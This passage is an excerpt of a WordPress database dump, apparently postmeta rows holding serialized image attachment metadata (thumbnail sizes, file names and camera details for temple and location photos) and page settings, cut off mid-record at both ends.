50;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_021-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_021-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_021-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_021-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_021-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"iPhone 4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1443634145\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.28\";s:3:\"iso\";s:2:\"64\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10836,125660,'_wp_attached_file','2019/08/ECK_Temple_CO_011-lg.jpg'),(10837,125660,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:698;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_011-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_011-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_011-lg-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_011-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_011-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_011-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_011-lg-250x166.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_011-lg-550x365.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:365;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_011-lg-271x180.jpg\";s:5:\"width\";i:271;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_011-lg-452x300.jpg\";s:5:\"width\";i:452;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_011-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_011-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"NEX-5R\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442687381\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"55\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:4:\"0.04\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6633,78665,'_wp_attached_file','2019/07/rocks-water.jpg'),(6046,7160,'_wpac_members_redirect_to',''),(6047,7160,'_wpac_show_in_search','0'),(6048,7160,'_wpac_show_excerpt_in_search','0'),(6049,7160,'_wpac_nonmembers_redirect_to',''),(10574,123035,'_wp_attached_file','2019/08/spex-accord-1.jpg'),(10575,123035,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:175;s:6:\"height\";i:238;s:4:\"file\";s:25:\"2019/08/spex-accord-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"spex-accord-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:23:\"spex-accord-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:25:\"spex-accord-1-132x180.jpg\";s:5:\"width\";i:132;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:25:\"spex-accord-1-175x150.jpg\";s:5:\"width\";i:175;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6807,83948,'_wp_attached_file','2019/08/ek-logo-med-blue.png'),(6808,83948,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:66;s:6:\"height\";i:65;s:4:\"file\";s:28:\"2019/08/ek-logo-med-blue.png\";s:5:\"sizes\";a:1:{s:6:\"wcicon\";a:4:{s:4:\"file\";s:26:\"ek-logo-med-blue-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6865,89020,'_edit_lock','1577402322:2'),(6866,89020,'_edit_last','2'),(6867,89020,'_wp_page_template','default'),(6868,89020,'_wpac_members_redirect_to',''),(6869,89020,'_wpac_show_in_search','0'),(6870,89020,'_wpac_show_excerpt_in_search','0'),(6871,89020,'_wpac_nonmembers_redirect_to',''),(6872,89020,'boldgrid_hide_page_title','0'),(6873,89020,'boldgrid_in_page_containers','1'),(6874,89020,'bgseo_robots_index','index'),(6875,89020,'bgseo_robots_follow','follow'),(10868,125676,'_wp_attached_file','2019/08/ECK_Temple_CO_029-lg.jpg'),(10869,125676,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:696;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_029-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_029-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_029-lg-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_029-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_029-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_029-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_029-lg-250x166.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_029-lg-550x366.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:366;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_029-lg-271x180.jpg\";s:5:\"width\";i:271;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_029-lg-451x300.jpg\";s:5:\"width\";i:451;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_029-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_029-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442658342\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:8:\"0.000625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10833,125658,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_008-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_008-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_008-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_008-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_008-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_008-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_008-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_008-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_008-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_008-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_008-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_008-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"iPhone 4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1443634280\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.28\";s:3:\"iso\";s:2:\"64\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(62544,247828,'_wp_attached_file','2020/01/co-springs-location-landscape-sized.jpg'),(62545,247828,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1073;s:6:\"height\";i:603;s:4:\"file\";s:47:\"2020/01/co-springs-location-landscape-sized.jpg\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"co-springs-location-landscape-sized-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:48:\"co-springs-location-landscape-sized-1024x575.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:575;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"co-springs-location-landscape-sized-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:47:\"co-springs-location-landscape-sized-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:47:\"co-springs-location-landscape-sized-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:45:\"co-springs-location-landscape-sized-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:47:\"co-springs-location-landscape-sized-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:47:\"co-springs-location-landscape-sized-250x140.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:47:\"co-springs-location-landscape-sized-550x309.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:309;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"wcbig\";a:4:{s:4:\"file\";s:47:\"co-springs-location-landscape-sized-800x450.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:47:\"co-springs-location-landscape-sized-320x180.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:47:\"co-springs-location-landscape-sized-534x300.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"wcfixedheight\";a:4:{s:4:\"file\";s:47:\"co-springs-location-landscape-sized-890x500.jpg\";s:5:\"width\";i:890;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:47:\"co-springs-location-landscape-sized-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:47:\"co-springs-location-landscape-sized-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcslider\";a:4:{s:4:\"file\";s:48:\"co-springs-location-landscape-sized-1073x500.jpg\";s:5:\"width\";i:1073;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(62887,248165,'_wp_attached_file','2020/01/loveland-landscape-sized.jpg'),(62888,248165,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1073;s:6:\"height\";i:604;s:4:\"file\";s:36:\"2020/01/loveland-landscape-sized.jpg\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"loveland-landscape-sized-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"loveland-landscape-sized-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"loveland-landscape-sized-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"loveland-landscape-sized-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"loveland-landscape-sized-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:34:\"loveland-landscape-sized-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:36:\"loveland-landscape-sized-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:36:\"loveland-landscape-sized-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:36:\"loveland-landscape-sized-550x310.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:310;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"wcbig\";a:4:{s:4:\"file\";s:36:\"loveland-landscape-sized-800x450.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:36:\"loveland-landscape-sized-320x180.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:36:\"loveland-landscape-sized-533x300.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"wcfixedheight\";a:4:{s:4:\"file\";s:36:\"loveland-landscape-sized-888x500.jpg\";s:5:\"width\";i:888;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:36:\"loveland-landscape-sized-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:36:\"loveland-landscape-sized-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcslider\";a:4:{s:4:\"file\";s:37:\"loveland-landscape-sized-1073x500.jpg\";s:5:\"width\";i:1073;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6055,64579,'_wp_attached_file','2019/07/co-springs-location-B.jpg'),(6056,64579,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:320;s:6:\"height\";i:269;s:4:\"file\";s:33:\"2019/07/co-springs-location-B.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"co-springs-location-B-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"co-springs-location-B-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:31:\"co-springs-location-B-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:33:\"co-springs-location-B-300x269.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:33:\"co-springs-location-B-250x210.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:210;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:33:\"co-springs-location-B-214x180.jpg\";s:5:\"width\";i:214;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:33:\"co-springs-location-B-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6059,64822,'_wp_attached_file','2019/07/loveland-center-sm.jpg'),(6060,64822,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:422;s:6:\"height\";i:269;s:4:\"file\";s:30:\"2019/07/loveland-center-sm.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"loveland-center-sm-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"loveland-center-sm-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:28:\"loveland-center-sm-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:30:\"loveland-center-sm-300x269.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:30:\"loveland-center-sm-250x159.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:159;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:30:\"loveland-center-sm-282x180.jpg\";s:5:\"width\";i:282;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:30:\"loveland-center-sm-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:30:\"loveland-center-sm-400x269.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"C725UZ\";s:7:\"caption\";s:22:\"OLYMPUS DIGITAL CAMERA\";s:17:\"created_timestamp\";s:12:\"-62169984000\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"6.4\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:22:\"OLYMPUS DIGITAL CAMERA\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(62329,247614,'_wp_attached_file','2020/01/landscape-temple-1-sized.jpg'),(62330,247614,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1074;s:6:\"height\";i:604;s:4:\"file\";s:36:\"2020/01/landscape-temple-1-sized.jpg\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"landscape-temple-1-sized-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"landscape-temple-1-sized-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"landscape-temple-1-sized-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"landscape-temple-1-sized-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"landscape-temple-1-sized-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:34:\"landscape-temple-1-sized-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:36:\"landscape-temple-1-sized-